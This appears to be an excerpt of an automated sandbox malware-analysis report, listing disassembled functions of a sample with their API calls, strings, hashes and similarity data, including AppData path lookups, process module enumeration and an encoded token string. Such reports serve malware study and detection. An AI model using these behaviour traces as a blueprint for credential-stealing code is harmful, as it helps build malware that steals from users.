                                • Instruction ID: 97f6a2b39ec574af2574354d58f35f717e5c2ee4582a173178ff7f66612cedfa
                                • Opcode Fuzzy Hash: 726f91929fa6fc9e2f788cec3b4af8b494e06b40cf41829b0ed65cc92a85c674
                                • Instruction Fuzzy Hash: FF21EAB23006504BC7209A5CE860A7AF799DFA1761B11097FF181CB381CB75DC41C3AD
                                Function 004D8850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D8883
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 3e46c5148bc5b1bfcce8235af34382eddd2b1682fa17fbabbced6847ec8519fe
                                • Instruction ID: 7291dc2668bebcf31da0373a03cb1cc7e0e4928fe15806fe6f3d5ca0fc8d7a8b
                                • Opcode Fuzzy Hash: 3e46c5148bc5b1bfcce8235af34382eddd2b1682fa17fbabbced6847ec8519fe
                                • Instruction Fuzzy Hash: 8D31A9B5E005199FCB08DF58C8916AEBBB6EB88350F14826EE915DF384DB34AD01CBD5
                                Function 004F5910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5922
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: f2ab0dd9e27134781693bc8b8c0010659880e9ea1d892a56226dcb4078b60aff
                                • Instruction ID: f66f51383da3c64723d4c7164f7c5bce347da7ec184259711a6812a81d5d437e
                                • Opcode Fuzzy Hash: f2ab0dd9e27134781693bc8b8c0010659880e9ea1d892a56226dcb4078b60aff
                                • Instruction Fuzzy Hash: C4118270304B44CBC7358B2CE900B2A7BE1ABD2760F250A5FE3D187795C7A5D841C7A9
                                Function 004F3CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,004FA430,000000FF), ref: 004F3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F3D27
                                • wsprintfA.USER32 ref: 004F3D37
                                  • Part of subcall function 004F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004F71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: e64aff3647baeea3c4964e155ff5342180ecc549eff9f620e6030c2f1da58ecb
                                • Instruction ID: 93851d6e4c715a4c1cc0a38308493bb8a38a8ea67ebba0f91b8642ec42641ab8
                                • Opcode Fuzzy Hash: e64aff3647baeea3c4964e155ff5342180ecc549eff9f620e6030c2f1da58ecb
                                • Instruction Fuzzy Hash: 8301C071640704FBE7105B54DC4AF6BBB68FB45B61F108215FB05D72D0DBB81900CAAA
                                Function 004F926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 004F9279
                                  • Part of subcall function 004F87FF: __amsg_exit.LIBCMT ref: 004F880F
                                • __amsg_exit.LIBCMT ref: 004F9299
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit$__getptd
                                • String ID: XuP$XuP
                                • API String ID: 441000147-2591469617
                                • Opcode ID: d37405e41480ef90f8a92f48b52ce9bfde115023b31fcf60c4d6cf9baa5c64bb
                                • Instruction ID: 17ef22bc8c554236c791f2be6c30e8600ce220162dde0a11bcb2156989ef04be
                                • Opcode Fuzzy Hash: d37405e41480ef90f8a92f48b52ce9bfde115023b31fcf60c4d6cf9baa5c64bb
                                • Instruction Fuzzy Hash: 0F01A132D0661DA6DB10AB2A98057BE73606F04B58F16044FEA0067691CB2C6D41EBDE
                                Function 004D8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004D8737
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 87eb18870526119309a9f552c716c1ad48c38921c6f6054aa25c62227750caf2
                                • Instruction ID: a944609aa1e007adc7b2a56c521fef169cc7379263c7da7bf16129f0877f87bf
                                • Opcode Fuzzy Hash: 87eb18870526119309a9f552c716c1ad48c38921c6f6054aa25c62227750caf2
                                • Instruction Fuzzy Hash: B0F0F033F000211F8344643E8D850AFA80756E539033AC72BE91AEF399DC34EC8285D8
                                Function 004F86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004F781C: __mtinitlocknum.LIBCMT ref: 004F7832
                                  • Part of subcall function 004F781C: __amsg_exit.LIBCMT ref: 004F783E
                                • ___addlocaleref.LIBCMT ref: 004F8756
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID: KERNEL32.DLL$XuP$xtP
                                • API String ID: 3105635775-3980384866
                                • Opcode ID: 960b0f83bed67e801ecbcae7265d19c62827bf6865ee10e996a73c624c60998f
                                • Instruction ID: 54c7d65a17eac817767c56b428afd150eea28ed3caa86a6eb5741f9ec84c59c9
                                • Opcode Fuzzy Hash: 960b0f83bed67e801ecbcae7265d19c62827bf6865ee10e996a73c624c60998f
                                • Instruction Fuzzy Hash: AD018471845B089AE720AF7AD84575EBBE0AF50358F20890FE2D5576E1CBB8A544CB18
                                Function 004EE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE573
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE581
                                • lstrcat.KERNEL32(?,00CFE600), ref: 004EE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: 9ee765dff7e6d2a27acac432a9c68f76ec99ad8fb692469962293b9774b66b78
                                • Instruction ID: 4cbbdb39b519324373a1c0d89f3ed87044fb190e49e2889bcf56f16b507468ca
                                • Opcode Fuzzy Hash: 9ee765dff7e6d2a27acac432a9c68f76ec99ad8fb692469962293b9774b66b78
                                • Instruction Fuzzy Hash: D251C3B1A1010CEBCB54EB55EC52EEA337CEB48304F4045AEFA0587351DE78AE408BA9
                                Function 004F1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004F1FDF, 004F1FF5, 004F20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: f6db99e1a4dbfc777d4bfdf26963293eba586daf4d0f854cd308693aa26c5e8e
                                • Instruction ID: 054943c348f5827bc7ab1b03c51dc37680ad48238b6fce0ac9bd037025c4fad6
                                • Opcode Fuzzy Hash: f6db99e1a4dbfc777d4bfdf26963293eba586daf4d0f854cd308693aa26c5e8e
                                • Instruction Fuzzy Hash: B8214B3651018E8EC720EA35C5456FEF7A6EF80351F844057CB180B381EBB9190ADB9F
                                Function 004EEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 004EEBF1
                                • lstrcat.KERNEL32(?,00CFF708), ref: 004EEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: e28659ea437915b750409e9a617a26c903897a16546c3ab769f0c3ac74423d82
                                • Instruction ID: 840419c9da4d43bcf31636826f569857e29f52b5b95915902ddf8814836b8508
                                • Opcode Fuzzy Hash: e28659ea437915b750409e9a617a26c903897a16546c3ab769f0c3ac74423d82
                                • Instruction Fuzzy Hash: 0331F571A1001CEBCB21EF65DD51BEE73B4EF58300F0045AAFA0697351CE78AE448B98
                                Function 004F4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000410,00000000), ref: 004F4492
                                • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004F44AD
                                • CloseHandle.KERNEL32(00000000), ref: 004F44B4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F44E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                • String ID:
                                • API String ID: 4028989146-0
